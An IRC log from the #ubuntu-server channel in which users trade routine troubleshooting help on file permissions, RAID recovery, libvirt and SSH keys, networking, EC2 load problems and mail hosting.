<RoyK> http://en.wikipedia.org/wiki/Network_Information_Service
<RoyK> ubottu: nis is http://en.wikipedia.org/wiki/Network_Information_Service
<Patrickdk> people still use NIS?
<pmatulis> Patrickdk: yes, JuJuBee does
<Patrickdk> heh, would think everyone would of probably dumped it for ldap
<RoyK> Patrickdk: we also use nis - moving to AD these days, but with a hundred boxes from solaris 8 and up, it might take some time
<willinja> where can i find ubuntu-server images that already configured php mysql torrentflux and samba ?
<savid> Hi, I have a deployment directory on my server where website files are uploaded by different developers.   My problem is that I need the owner/group permissions to stay the same on all files within that directory, even files that are added.  Is there an easy way to manage this?
<jo-erlend> chmod +s
<jo-erlend> savid, mode s is for sticky. It does that. I think it's described in chmods manpage, but you'll find many references to it on the web as well.
<savid> jo-erlend,  So if I do sticky on the web root directory,  any files added under that directory will inherit that permission?
<jo-erlend> savid, sorry. I means setuid/setgid. Sticky is something else, but it is mode s and yes, it does what you want.
<savid> Ah, ok
<savid> Thanks!
<jo-erlend> you'll have remember to set mode s on all the files and directory manually first though, since only new files and directories inherit the modes.
<jo-erlend> it does completely different things if you apply it to an executable, so if you should have any executables in those directories, pay attention.
<savid> jo-erlend, so (I'm assuming) for executables, it runs them as if they were run as the set uid?  that's why I need to be careful?
<jo-erlend> right.
<RoyK> jo-erlend: what does sticky do to an executable?
<jo-erlend> I have no idea. I'm not sure it has any effect on executables at all.
<jo-erlend> well... Any special effects, I meant.
<p1l0t> I am trying to install server 9.04 (will upgrade once finished dont have anymore blank cds cant boot usb) on a compaq server with dual 18gb hdd but it is reading them as one 36gb drive and giving me an input output error no matter what I try :(
<RoyK> jo-erlend: it did http://en.wikipedia.org/wiki/Sticky_bit - but never on linux, it seems
<RoyK> p1l0t: probably raid0 setup on the raid controller
<savid> Oh interesting, it seems that setuid on directories is ignored.
<jo-erlend> savid, setgid works.
<RoyK> savid: use ACLs if you want full control
<p1l0t> RoyK: do I need to move a jumper or change something in the bios then?
<jo-erlend> in your scenario, I would set s on the group, not the owner. I always do that.
<RoyK> p1l0t: no, boot on a smartstart CD and configure the raid
<RoyK> p1l0t: what sort of server is this?
<p1l0t> Its a compaq stackable dual 1g processors
<RoyK> does it have a raid controller?
<RoyK> p1l0t: that is - cat /proc/partitions - what is the device names there?
<p1l0t> Prolient DL360 it has some kinda of smart array thing
<RoyK> ok
<RoyK> reconfigure the raid
<RoyK> from a smartstart cd
<RoyK> setup a mirror or seperate drives if you like
<p1l0t> /dev/ida/c0d0 - 36.4 GB Compaq Smart Array
<RoyK> ok
<RoyK> this is not about linux, it's the 'hardware' raid setup that's the problem
<p1l0t> So I need to figure out how to 'unraid' it then first
<RoyK> yes, boot on a smartstart cd
<RoyK> you can download the images from HP
<p1l0t> Ok thanks RoyK I will have to go buy some blanks then
<p1l0t> That or unplug one of the harddrives and see what it does :)
<b0gatyr_> Hello, I have set up a static ip on ubuntu server but after a few hours it goes back to dhcp although the interfaces file has the static address in it.. why is this?
<dominicdinada> question.... why do things such as phpscripts require ftp access... for updates when they are using sockets? or what not. Better yet for instance wordpress to update it or do anything is asking for ftp access
<dominicdinada> should i check apache for url_include or what not  ?
<giovani> dominicdinada: what do you mean "they are using sockets"?
<giovani> they want FTP access so they can upload new copies of the php files
<giovani> which is an entirely dangerous thing to hand out on the web, but, people do it because it makes upgrading easy
<dominicdinada> arnt they using fsockopen.... to transfer files. or say url include
<giovani> I'm unclear on what you're talking about
<giovani> a wordpress upgrade is simply a replacing of a few files
<giovani> that's done over FTP, usually
<dominicdinada> giovani correct in a production enviroment they do not require ftp access...
<giovani> who is they?
<dominicdinada> oh on a public site i have never been asked... for ftp access
<giovani> I have no idea what you're talking about
<dominicdinada> various php scripts
<giovani> wordpress, the company
<giovani> uses the FTP protocol, to put new copies of the wordpress php files onto your server automatically
<giovani> this has nothing to do with php or scripts in general
<dominicdinada> hmmm
<giovani> just a particular method that wordpress, the company, uses to make upgrading easier and semi-automatic
<dominicdinada> ugh and my ftp host is not allowing my user to access it lol wtf
<giovani> how did you get wordpress onto the server in the first place?
<dominicdinada> via download and placed the script and ran install
<giovani> so do that again
<giovani> you don't NEED to use their automatic update feautre
<giovani> you can manually upgrade wordpress
<giovani> through an almost identical process as installing it -- they have a howto on the website
<dominicdinada> i was trying to avoid that
<giovani> why?
<dominicdinada> that is how i was doing it manually........ for the last xxx months but i guess i have no accounts setup for ftp access
<ruben23> guys why VPS servers have very low memory allocation like, 256, 512Mb,1Gb- with this can this process apps like normal servers..?
<giovani> ruben23: that's not "low" for the vast majority of uses
<giovani> I run many servers with 64MB of ram
<patdk-wk> heh, lucid uses 24megs on boot :)
<ruben23>  giovani: whats apps are in there..?
<giovani> ruben23: lighttpd,nginx,djbdns,openssh
<giovani> patdk-wk: depends on your configuration
<ruben23> web server..? you host your own or is it hosted..?
<giovani> ruben23: it's a VPS ...
<jo-erlend> a webserver doesn't require much ram at all.
<giovani> well, apache is full of bloat
<giovani> but good web servers can be quite efficient with ram
<jo-erlend> well... In normal instances. If you have lots of visitors, then it uses more.
<giovani> nginx and lighttpd are good examples
<patdk-wk> giovani, well, I mean just the bare needed stuff, for ubuntu-server
<giovani> patdk-wk: but that's flexible
<patdk-wk> add ontop of that whatever your server does
<giovani> I do a lot of stripping down
<ruben23> oh ok, now how VPS differs with cloud servers..?
<jo-erlend> ruben23, it doesn't.
<giovani> ruben23: there's no difference theoretically
<giovani> in practice, most VPSes you buy are not fault-tolerant
<giovani> while "cloud" servers like EC2 usually are
<patdk-wk> heh? ec2 is not fault tolerant at all
<jo-erlend> ruben23, the cloud just makes it less tangible, which is the whole point of the cloud. You don't worry about how it happens, as long as it does.
<giovani> this is just industry practice and naming though
<giovani> patdk-wk: they're run on live-migration hardware ... so, they are
<giovani> most of the "VPS" industry runs your VPS on a single, non-portable server
<patdk-wk> ec2 clearly states you can lose your instance, disk, ... at any point
<giovani> patdk-wk: what they guarantee and what is implemented are different things
<dominicdinada> !ftp
<ubottu> FTP clients: Nautilus (Places -> Connect to server), gFTP, FileZilla (for !GNOME); Konqueror, Kasablanca, KFTPGrabber (for !KDE); FireFTP (for Firefox); ftp, lftp (for !cli) - See also !FTPd
<dominicdinada> !ftp server
<ubottu> FTP servers: ftpd, proftpd, pure-ftpd, twoftpd, vsftpd, MuddleFTPd, wzdftpd - Graphical front-ends: PureAdmin, GProftpd (for GNOME), KcmPureftpd (for !KDE) - See also !FTP
<dominicdinada> !FTP
<rutri> hello, i need help getting my server up and running
<giovani> rutri: that is an incredibly general request
<rutri> ok
<uvirtbot> New bug: #635843 in samba (main) "package samba 2:3.4.0-3ubuntu5.6 failed to install/upgrade:" [Undecided,New] https://launchpad.net/bugs/635843
<rutri> I need help getting access to KVM using virt-manager
<rutri> I have followed all of the instructions on the Ubuntu server document site including adding my user to the libvirtd group however my connection is still getting refused when I use virt-manager form my desktop computer.
<rutri> can anyone help me?
<yann2> hi rutri
<yann2> you do know that even once you have been added to the group
<yann2> you need to logout and login again so that it is effective ? :)
<yann2> maybe its just that
<rutri> yann2: i rebooted after I set it all up is that enough?
<yann2> yes :P
<rutri> yea :( i have rebooted several times and added the sysadmin account as well as my desktop users account.
<rutri> I have also disabled the firewall, if you can give me that link where I can post large bodies of text I will give you the virt-managers detailed report.
<Znuff> Hi. Any ideas how can I install pdo_sqlite under ubuntu-server 10.04?
<Znuff> all I get is configure: error: Cannot find php_pdo_driver.h.
<rutri> any other suggestions?
<rutri> yann2 you still there?
<BobSapp> hey there, I want to roll out a very minimal ubuntu server cloud nodes for ai purposes.  As a result they only really need to have perl and some cpan modules installed.  no services other than ssh for communication.
<BobSapp> I was thinking about using EC2 to host these operating systems.  Can I do this with ubuntu cloud or would I have to instanciate an ubuntu server every time and tell it to install the packages i needed each time?
<rutri> Does anyone know why libvirtd would not be installed if I installed libvirt-bin?
<yann2> rutri, I guess you might want to not run libvirtd, but just the tools to connect to an instance somewhere else, if I understand it right?
<rutri> ok then what is used as the interface for qemu+ssh?
<rutri> yann2: this link is what I used to set up the server http://www.ideyatech.com/2010/05/virtualization-with-ubuntu-1004-lucid-lynx/
<rutri> I have KVM and libvirt-bin tools installed however when I try to connect with the manager its like the server is not there
<rutri> I have added my users to the libvirtd group and reset the server several times with no luck.
<SpamapS> wow.. booting a lucid t1.micro on ec2 takes about 45 seconds from run-instances to ssh being available
<ph8> hi all, i'm having an ubuntu server nightmare, i seem to have lost my raid config between a hardy->lucid upgrade - i see no md devices on boot, any thoughts on how i can get them working again from busybox?
<ph8> the disks don't appear to have uuid's, although they're all there as devices (sda*) which is odd
<SpamapS> ph8: whats in /proc/mdstat ?
<ph8> just the personalities: [linear] [multiple] [raid0] [raid1] etc... line and unused devices: <none>
<ph8> the system drops to busybox because it can't find /dev/md0 to boot to
<SpamapS> ph8: can you paste the output of 'fdisk -l sdX' on paste.ubuntu.com ?
<ph8> it would appear i don't have fdisk on busybox
<SpamapS> ph8: right.. hm
<ph8> i see 3 sd partitions on each disk in /dev
<ph8> which seems right
<ph8> and /etc/mdadm/mdadm.conf looks ok
<SpamapS> do you have mdadm?
<ph8> well, it's configured by uuid
<ph8> yes i have mdadm
<SpamapS> ok.. hmm
<ph8> so i guess i could try and recreate my arrays
<ph8> with mdadm
<ph8> but in /dev/disk
<ph8> i don't have a by-uuid folder
<ph8> but i do have a by-id
<ph8> any thoughts on why that might be?
<SpamapS> do mdadm --examine /dev/sdX
<ph8> will do when it's back in a sec
<SpamapS> you shouldn't need "uuids"
<SpamapS> you just need raid superblocks
<SpamapS> which you should most definitely have
<SpamapS> the examine should show the UUID's of each raid member that it expects to see
<SpamapS> but those are the raid superblock UUID's
<ph8> ah ok, that's what's in mdadm then?
<ph8> not the disk uuid's as i thought
<ph8> * mdadm.conf
<SpamapS> if the partitions aren't set to FD (raid autodetect) then the md driver won't detect them and try to assemble from them
<ph8> would that have been changed in a dist-upgrade though?
<SpamapS> no
<SpamapS> but maybe they weren't created properly
<ph8> hmm maybe, they have worked in the past
<ph8> just waiting for someone in the dc to reboot the server
<SpamapS> its entirely possible you've been relying on the device ordering or something in the initrd ..
<SpamapS> ph8: you upgraded remotely?
<ph8> with kvm access
<ph8> still not my ideal
<ph8> it actually went fine on 3 other boxes, this was the last one (typical)
<SpamapS> ph8: yeah, thats a little scary. ;)
<SpamapS> ph8: this has come up a few times, so I'm wondering if we need to do some fixing for 10.04.2
<SpamapS> ph8: once this is figured out, it would be REALLY great if you could put together a bug report.
<ph8> yeh i'd love to
<ph8> if/when i get it fixed :-s
<SpamapS> right :)
<ph8> i should know better than doing an upgrade on a saturday afternoon when i'm expected at dinner in about 2 minutes (1 hour drive away) :p
<SpamapS> heh.. been there, done that.
<rutri> anyone here familiare with libvirt?
<ph8> i have used it in the past
<ph8> they've got a good support channel on irc.oftc.net in #virt as well
<rutri> ok thanks
<rutri> the #virt channel may be able to help me
<rutri> how do i get into the #virt channel its password protected.
<SpamapS> rutri: on OFTC or on Freenode?
<uvirtbot> New bug: #635895 in libcommons-fileupload-java (main) "libcommons-fileupload-java (main) build-depens on libportlet-api-2.0-spec-java (universe)" [High,Confirmed] https://launchpad.net/bugs/635895
<rutri> im on freenode
<ph8> SpamapS:  back in
<SpamapS> ph8: mdadm --examine /dev/sdX
<ph8> so on sda2
<ph8> i have 2 active devices
<ph8> and sda 5
<ph8> and sda6
<ph8> i have an sda1 but i don't think there should be any active devices there
<ph8> so 3 partitions of raid superblocks
<ph8> any thoughts on how to proceed/
<ph8> some sort of mdadm --doallthemounting ?
<ph8> gargh, are there no text editors in busybox
<ph8> it looks to me like mdadm.conf has the same section twice for raid config
<ph8> so i need to just take out the bottom section and that's a start if nothing else
<ph8> but how do i text edit!
<SpamapS> ph8: does it show the UUID's of the other expected members?
<SpamapS> mdadm.conf is sort of inconsequential if you have FD type partitions. I'm surprised you don't have fdisk.
<ph8> yes, the uuids are the same in both sections
<ph8> fdisk isn't there when i type 'help' and the command doesn't work :(
<SpamapS> ph8: you should be able to have mdadm output the correct config file once you assemble the arrays properly
<ph8> ok so i'll use mdadm to assemble my arrays?
<SpamapS> ph8: you can use mdadm --assemble I believe
<SpamapS> ph8: got backups?
<ph8> no actually
<ph8> :-s
<ph8> i should know by now
<ph8> i've only been doing this 10 years
<ph8> i can pass assemble a uuid
<ph8> worth a go?
<ph8> do i actually risk dataloss doing an assemble? won't it reject mismatching arrays?
<SpamapS> wtf, no backups?
<SpamapS> yes you do risk fat fingering something and messing things up
<ph8> yes i know :/
<ph8> /dev/md0 is started with two drives!
<SpamapS> just don't use --force ;)
<ph8> using --assemble /dev/md0 --uuid <uuid>
<SpamapS> yeah that should work. :)
<ph8> then i just exit busybox and it boots?
<SpamapS> dunno abt that
<ph8> lets see
<ph8> hurray
<ph8> it's booting
<ph8> so do you think it's just a malformed mdadm.conf?
<rutri> ph8 no one is talking in the OFTC #virt channel, does it usually take them long to respond?
<ph8> yes sorry they do take their time
<ph8> but they do respond
<ph8> what's your question maybe i can help
<rutri> ph8  have followed this guide http://www.ideyatech.com/2010/05/virtualization-with-ubuntu-1004-lucid-lynx/ and tried to get libvirt working on my Ubuntu 10.4LTS server however I cannot connect to it.
<SpamapS> ph8: I'd verify that your initrd is up to date and that mdadm.conf is right
<SpamapS> ph8: yous hould also check out the partition types, make sure they're FD
<SpamapS> For all I know, they've done something weird with the initrd and don't use FD type partitions anymore.
<ph8> yes they are autodetect
<SpamapS> ph8: I suppose thats why --assemble worked actually..
<SpamapS> ph8: not sure why those weren't automatically started and run :-P
<SpamapS> ph8: I know you're under the gun, but if you can save that bad mdadm.conf, and maybe attempt to recreate the problem.. it might save a few other people from having this problem as people start moving from hardy to lucid
<ph8> indeed
<SpamapS> ph8: my guess is that hardy saved a bad madadm.conf, which was never used before.. and now lucid uses it, and fails
<ph8> the upgrade uninstalled mysql as well!
<ph8> very odd
<BauerUK> are there no alternate downloads (mirros/bittorrent) for Ubuntu server? the http download is running at ~50 KB/s
<ph8> bittorrent will likely be much faster
<ph8> i know i'm seeding on a 100mbit pipe for example
<BauerUK> could you link to the torrent? i don't see it on the download page
<ph8> sorry i'm a little busy
<ph8> pretty sure it's there
<rutri> ph8 did you have any suggestions for my problem?
<ph8> what do you see when you run 'virsh list' rutri ?
<rutri> do i run it on the client or the server?
<rutri> oh wait
<rutri> I ran virsh -c qemu:///system list on the server and got nothing running witch I would expect because I have not set any VM's up.
<BauerUK> nevermind, i got it. the link isn't on the server download page itself, but available through an unrelated downloads page
<rutri> ph8 it seems like its running however it just not listening on the management port?
<ph8> is it all on one server?
<ph8> or are you administering multiple libvirt daemons from one machine?
<rutri> ph8: I want to set up multiple VMs one one machine, its going to be a virtual server.  but as far as i know there is only one libvirt daemon running.  How do I know if the daemon is running properly?
<ph8> i'm sorry i'm due out
<ph8> apologies for not being more helpful
<rutri> meh its ok
<rutri> I may just go back to a windows server, its way easier to set things up there.
<rutri> I have a n ssh question that my be causing the problem.
<rutri> if my ca certificate has changed how do i update it on my desktop computer?
<RoyK> what?
<RoyK> you mean if ssh complains about something bad?
<rutri> yes
<rutri> because my key is outdated
<RoyK> vi $HOME/.ssh/known_hosts
<rutri> how do i force ssh to update the certificate?
<RoyK> just remove the old key
<rutri> cool thanks one second
<RoyK> vi $HOME/.ssh/known_hosts +linenumber
<RoyK> dd
<RoyK> :wq
<rutri> ok that worked, I figured out my problem, now I am able to connect to my virtual host
<rutri> thank you very much Royk and ph8
 * RoyK opens a beer
<RoyK> rutri: np
<rutri> Ryok I have been trying to get this VM server up an running the past week lol i didnt know changing my CA key would break it.
<rutri> Ryok but it makes sense since it tunnels through ssh.
<RoyK> I guess you'd want to know if your server's ssh key suddenly changed
<bobobob> I am trying to learn how the LAMP system is put together....It seems that /var/www is setup for root 755 and if you add something like wordpress, how do you change permissions for wordpress to be able to write to its cache directories?  Seems like there should be a user associated with the running of wordpress, how do I find that?
<bobobob> is there a wordpress user that it runs under?
<rutri> RoyK: yea but Linux nubs like me don't think of these things lol.
<RoyK> hehe
<RoyK> perhaps you'll think of it next time
<RoyK> bobobob: it all runs under user www-data
<RoyK> give that user write access to the specific directories it needs to write to
<RoyK> not all of the wordpress install
<RoyK> allowing www-data to write to the whole wordpress install might compromise your system when a security issue comes up
<RoyK> note, not if, when
<bobobob> okay...RoyK...thanks
<rutri> Royk: Oh believe me, if it uses and SSH tunnel I will be making sure the certificates are good.
<RoyK> bobobob: it's not about wordpress being insecure, it's about _all_ systems being insecure - don't take chances
<atm0s> Question, I made a copy of my ISCSI image on which Ubuntu Lucide Server was installed and created a new ISCSI target with that copy, what files in that filesystem should I change, to make Ubuntu know to boot from the NEW target, not the OLD..? /etc/iscsi didn work..
<guntbert> atm0s: but here too: you will only get an answer if someone has to say anything about that - you are not being ignored
<atm0s> great :)
<Qix> I am having uber issues -- my linux box recognizes ethernet devices but wont connect at all.
<Qix> /etc/network/interfaces was configured like a guide told me but still no beans
<Qix> any help? >.>
<Qix> lawl wrong button.
<Qix> any help?
<guntbert> Qix: what guide was that?
<Qix> err lemme find it.
<Qix> http://www.cyberciti.biz/faq/setting-up-an-network-interfaces-file/
<Qix> ^
<guntbert> !serverguide | Qix look at that please
<ubottu> Qix look at that please: The Ubuntu server guide may be found at http://help.ubuntu.com/10.04/serverguide/C/
<ecelis> ~/win 12
<ecelis> oops
<Qix> The problem is is that DHCLIENT fails.
<JasonMSP> im installing postfix and the first screensays, "Please select the mail server configuration type that best meets your needs."  with <ok> at the bottom.  Im connected SSH and I cant click, select ok.  i've tried enter.  That didn't work.  and I don't have a cursor inside the window either.
<JasonMSP> ctrl c, q or x doesn't work either.
<guntbert> Qix: do you have a DHCP server running in the network?
<Qix> yes.
<Qix> All of my windows boxes connect just fine.
<guntbert> JasonMSP: <tab> should move the highlight
<JasonMSP> THANK YOU!
<Qix> and the server now running ubuntu server, the box in question, had windows server 2008 on before it, and it connected just fine.
<JasonMSP> that was nerve racking!
<guntbert> JasonMSP: :-)
<Qix> dhclient fails with "No DHCPOFFERS received"
<guntbert> Qix: have a look at /var/log/syslog, and are you sure that the interface is "up"?
<Qix> Ill take a look, and yes ifup returns that the interface is up.
<Qix> guntbert - syslog shows DHCLIENT says : ADDRCONF (NETDEV_IP): eth1: link is not ready
<Qix> seems to be the first error.
<Qix> eth1 is the NIC card Im using.
<Qix> wanting to use, anyway.
<guntbert> Qix: link is not ready: that could mean there is no cable in the nic
<Qix> just checked -- its in there, and all four lights are on
<Qix> and my router's light for that port is on.
<Qix> which is better than before when I was using the on-board nic port
<Qix> my router didn't even acknowledge it was connected.
<Qix> and I tried plugging the same eth cable into a working, tested laptop and I got a link right away
<Qix> would plugging my modem directly into the box help?
<Qix> it may be my router refusing the connection.
<Qix> guntbert?
<guntbert> Qix: are you certain its eth1? you could try: tailf /var/log/syslog     and then plug/pull the cable and watch the log
<Qix> weird
<Qix> it freaks out when I plug it into the default port.
<Qix> instead of the PCI nic
<Qix> ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
<Qix> >.>
<Qix> lemme take a look
<Qix> k so it looks like my onboard is actually eth1
<Qix> alright well now
<Qix> when i plugged it into eth1, and ran ifconfig it showed it assigned an IP
<Qix> let me look at my router...
<guntbert> Qix: all ok now?
<Qix> alright sorta
<Qix> router is now showing the computer's hostname, etc.
<Qix> but when i try to ping it shows host is unreachable
<Qix> ping google.com
<Qix> doesn't work
<Qix> same with pinging my gateway IP
<Qix> Destination Host Unreachable
<guntbert> and Qix for the next time: please use the nick of your partner in most/every line  -- I'm like following about 10 channels right now and without highlight it might take a long time till I see your answer
<Qix> ah kk
<guntbert> Qix: start pinging the own IP address
<Qix> guntbert: the computer's IP address?
<guntbert> Qix: yes
<Qix> guntbert: kk thats working.
<Qix> guntbert: but pinging the router or google.com or my other computer is not working.
<guntbert> Qix: good, can you ping any other host on your home network?
<Qix> guntbert: nope
<guntbert> Qix: then I suspect the switch might make troubles
<marc__> hi all
<Qix> guntbert: probably. Should I try connecting the modem directly to the box?
<Qix> ifconfig
<Qix> blah
<Qix> wrong keyboard
<guntbert> Qix: not sure, but restting the switch might be a good idea (or are all your computers connected to the router?)
<Qix> guntbert: they are all connected to the one router
<guntbert> Qix: then look into that router - config, firewall, reset it....
<guntbert> !hi | marc__
<ubottu> marc__: Hi! Welcome to #ubuntu-server! Feel free to ask questions and help people out. The channel guidelines are at https://wiki.ubuntu.com/IRC/Guidelines . Enjoy your stay!
<marc__> where should I put things I want all website to have access?  I want all virtual host to be able to access files like PHP library (ie: zend framework, cakephp) for read only.
<Qix> guntbert: alright, Ill play around with it. Ill try connecting directly to the internet to see if that works. Brb...
<guntbert> marc__: that looks like the perfect case for nfs...
<marc__> for now it will be on the same server as the virtual hosts.  (got only 1 server)
<marc__> I'm thinking /usr/share/php maybe?  or /var/www/shared ....  what I want is to be able to create a new virtual host for a website and give access to the libraries without having to install them in each folders...
<Qix> guntbert: kk, I connected it directly to the internet, and I could ping google.com no problem
<guntbert> marc__: but nfs is independant of the virt product you use
<Qix> its my router.
<guntbert> Qix: seems so
<Qix> guntbert: I'll reboot my unbuntu box to make sure its all working by default, and then play around with the router settings.
<guntbert> Qix: good way to take
<Qix> :]
<Qix> guntbert: Everythings working :] just needed a reboot it looks like
<Qix> thanks for the help!
#ubuntu-server 2010-09-12
<chewbranca> how can I install lucid server with no gui?
<lifeless> grab the server install cd and install from it
<chewbranca> bah... used the wrong iso to mount on the thumbdrive :/
<chewbranca> ahhhh... I see what happened now, when you add a new iso to usb-creator-gtk it doesn't automatically select it
<chewbranca> ahhhhh much better, thought it was a little weird I had to keyboard tab through the mouse based install process
<[R]> how do i make upstart's output on tty1 instead of tty7?
<marc__> anyone here having experience with ubuntu on Amazon EC2?
<tucemiux> How do I update packages??? -->19 packages can be updated
<tucemiux> nevermind, I figured it out
<chewbranca> marc__, do NOT run 10.04 on EC2 if you're going to use EBS
<chewbranca> use 9.10
<chewbranca> 100%
<marc__> chewbranca, why?
<chewbranca> with 10.04 there is a serious bug that sky rockets load averages
<chewbranca> I've got 2 boxes running in production with on EC2 with EBS and both are sitting at a load average above 10 with 99% idle cpu
<marc__> chewbranca, I see... even with the AMI launched last month?
<chewbranca> absolutely stay away from this until its fixed
<chewbranca> the bug still hasn't been resolved
<[R]> chewbranca: do you have a #?
<chewbranca> https://bugs.launchpad.net/pantheon/+bug/574910
<uvirtbot> Launchpad bug 574910 in linux-ec2 "High load averages on Lucid while idling" [Undecided,In progress]
<chewbranca> I posted on it back until july
<marc__> chewbranca, maybe you can answer a question I have... I was following this guide  http://www.howtoforge.com/perfect-server-ubuntu-10.04-lucid-lynx-ispconfig-3-p3  and there's a part about edition the file  /etc/network/interfaces  to setup static IP... Is it also required on EC2 ?
<chewbranca> marc__, this only appears to be affecting EBS instances, so if you're planning on running EBS (which you probably want to because its very nice) then stay on 9.10
<chewbranca> no you don't need to set the ip address with EC2, amazon handles elastic ip addresses for you, so you can actually have a static public facing ip address and move that around internally to whatever instance you move to
<chewbranca> $ uptime 00:49:22 up 65 days,  1:11,  1 user,  load average: 14.61, 14.86, 14.24
<chewbranca> that's rather annoying
<chewbranca> live production server
<chewbranca> 97.7% idle
<marc__> thanks for the info chewbranca
<chewbranca> marc__, no problem, 9.10 is solid and still new enough to run most of what you want, so I would run with that, 10.04 on the other hand I've had multiple issues with
<marc__> chewbranca, if I check the info using "top" it tells me load average of 1.43
<chewbranca> marc__, load average on what?
<marc__> ubuntu 10.04 ebs on ec2
<marc__> using ami 099720109477/ebs/ubuntu-images/ubuntu-lucid-10.04-i386-server-20100827
<chewbranca> and that load average is at complete idle right?
<chewbranca> give it a minute or two
<marc__> yes
<chewbranca> fyi, I'm doing a new install locally on a server here, after a few minutes the load average is 0.02
<chewbranca> versus 1.43
<chewbranca> read that bug link I posted, that's the exact issue
<chewbranca> don't use that 10.04 ami
 * Psi-Jack is back. Be afraid. Be very afraid. :)
<marc__> dunno... I used that ami, then installed lamp package and ispconfig3:     top - 01:02:43 up  5:30,  1 user,  load average: 1.63, 1.56, 1.48 ... but then again I'm a noob with linux servers :P
<chewbranca> marc__, my current load is 0.00
<chewbranca> that's what it should be on a new install
<chewbranca> your's is 1.63
<chewbranca> read that bug thread, its not good, you're running into the EXACT issue I am talking about, don't use it until its fixed
<chewbranca> grab 9.10 and use that
<marc__> ok, thanks, then I'll go try with 9.10
<chewbranca> marc__, no problem
<marc__> chewbranca, can you have a look at http://www.howtoforge.com/perfect-server-ubuntu-9.10-ispconfig-3 ?  do you think that it's a good guide to setup a web server?
<MTecknology> chewbranca: probably not.. howtoforge and 'best' usually fall far aprt
<MTecknology> it usually covers hacks that people have accepted as a good way to do things - in my experience
<MTecknology> marc__: **
<MTecknology> marc__: http://doc.ubuntu.com/ubuntu/serverguide/C/
<marc__> MTecknology, thanks.
<marc__> I've read that it was not recommended to send email from an ec2 instance as it might be considered as spam (something about reverse dns), do you know if the elastic ip fixes that problem?
<marc__> chewbranca, ^^
<ph8> hmmm
<ph8> my mysql doesn't star
<ph8> * start
<ph8> i'm struggling to find the caus
<ph8> this is post hardy->lucid upgrade
<chewbranca> marc__, I'm hesitant to trust anything described as 'perfect', but if you're just trying to get a lamp stack going most tutorials will be fine, just need to get apache/mysql/php installed, and that's fairly straightforward with ubuntu
<chewbranca> marc__, the serverguide MTecknology linked looks like it covers everything you would want to do
<marc__> chewbranca, yeah, I'm reading it right now, but his link was for 10.04, but I found the doc for 9.10
<chewbranca> I'm not familiar with issues related to sending email from EC2, I've been sending emails through gmail hosted domain email without any issues
<chewbranca> marc__, oh ok cool
<chewbranca> also, for email, you can't go wrong with http://www.mailchimp.com/
<chewbranca> free outgoing emails up to 3000 a month
<marc__> chewbranca, I want a lamp stack that I'll use for development, but I would like to be able to make a production after so I'm trying to find good example :)
<ScottK> marc__: Lots of spam is sent from EC2 IP space so it's not unusual for receivers to treat it suspiciously.
<chewbranca> marc__, I highly recommend reading that server guide (or the 9.10 version), its a worth while investment of your time and in the long run is better than just following a tutorial
<marc__> chewbranca, if I want to setup a webmail on my ec2 server, I can use mailchimp to forward sent messages?
<chewbranca> marc__, mailchimp handles sending out newsletter emails and what not, not sure what you mean by 'forward sent messages'
<marc__> chewbranca, well, maybe I didn't understand correctly...   I want to create a ec2 instance that will be used for development, but I want to use my domain (already using dnsmadeeasy.com to forward my domain to the elastic IP I got). on that instance I want to setup a mail server (pop/imap)... I want to move my email out of my shared hosting account... once I do that, if I send an email to someone, I don't want it to be conside
<marc__> red as spam.
<marc__> so I thought that I needed to forward all emails sent from my ec2 instance to another trusted service?
<chewbranca> yeah I hear you, I'm just saying I'm not familiar with the issues surrounding EC2 based email as I haven't run into them, as ScottK pointed out, lots of spam shows up from EC2 so its definitely possible it could be considered spam
<chewbranca> honestly, if you're not doing a huge amount of outgoing emails, just use google's hosted email service, not even worth your time to manage email when google does a great job of it for free
<chewbranca> then all your email will be coming from google's servers, and its not even an issue
<marc__> chewbranca, hmmm, yeah, good idea... up to 50 email address
<marc__> chewbranca, thank you very much, you've been a great help for me tonight :D
<Psi-Jack> Heh
<Psi-Jack> Google Mail... Yeaah. when you run servers and such that send email of their own, google mail is bad.
<Psi-Jack> Trust me.
<Psi-Jack> It's Bad. ;p
<marc__> Psi-Jack, why?
<marc__> Psi-Jack, I want my server to send me email on certain events  (web app logging)
<Psi-Jack> marc__, Why? Heh. Because your origin endpoint isn't google-apps.
<Psi-Jack> marc__, So not only do you have to STILL use your SMTP servers your own self, but you have to make sure it accepts mail and delievrs it to the proper gmail servers as well.
<marc__> Psi-Jack, I guess that would work:  http://serverfault.com/questions/54069/how-to-setup-ubuntu-mail-server-with-google-apps
<Psi-Jack> marc__, That's only about 25% of what you need.
<ruben23> guys i have ubuntu server version 10 but i want to install a lower package version of php please help me...its been weeks figuring it out.
<ruben23> guys any idea and help please
<au> ruben23: no idea :/
<au> ruben23: http://www.google.com.au/search?sourceid=chrome&ie=UTF-8&q=php+5.2+on+ubuntu+lucid
<ruben23> how do i cehck what version of ubuntu server i have..?
<lifeless> lsb_release -a
<blackmatter> is there any way to transmit on submission port with postfix?
<aarcane> so I'm running ubuntu server, how do I find the funky text name of my release ?
<blackmatter> arcane
<blackmatter> cat /etc/issue
<aarcane> /etc/issue has the numerical release, Ubuntu 10.04.1 LTS \n \
<aarcane> but not the named release
<blackmatter> lsb-release
<blackmatter> if lsb not present then idk
<aarcane> it's tucked at the bottom of lsb_release -a
<blackmatter> ye
<blackmatter> u can uname -a
<blackmatter> as well
<blackmatter> forgot to mention XD
<JasonMSP> im installing postfix and need to telnet to test it out.  telnet is installed but when I type telnet localhost 25 i get  -bash: telnet: command not found
<blackmatter> jason
<blackmatter> on /etc/postfix/master.cf do u have smtp as chroot?
<JasonMSP> its got a dash (-)
<blackmatter> hmm
<blackmatter> try telnet 127.0.0.1 smtp
<JasonMSP> thats not going to work because telnet command is not even found.
<JasonMSP> telnet is installed though.
<blackmatter> lol
<blackmatter> sudo apt-get install putty
<blackmatter> putty 127.0.0.1 smtp
<JasonMSP> im ssh into my server from the house
<blackmatter> hmm
<blackmatter> plz cat /etc/postfix/main.cf
<JasonMSP> ok and?
<blackmatter> pm me that
<JasonMSP> telnet is my problem.  not postfix though
<blackmatter> ic
<blackmatter> u can remove completely then reinstall
<blackmatter> if that wont work download putty
<uvirtbot> New bug: #636195 in autofs5 (main) "Autofs for LDAP doesn't contain ldif file" [Undecided,New] https://launchpad.net/bugs/636195
<JasonMSP> apt-get install libmd5-perl comes up "Couldn't find package libmd5-perl"  ?????
<au> apt-get update && apt-get upgrade
<au> then do it
<au> also, I checked in ubuntu 10.04 lts, dosen't exist.
<JasonMSP> hmm...  thats what im running
<au> apt-cache search perl | grep 'md5'
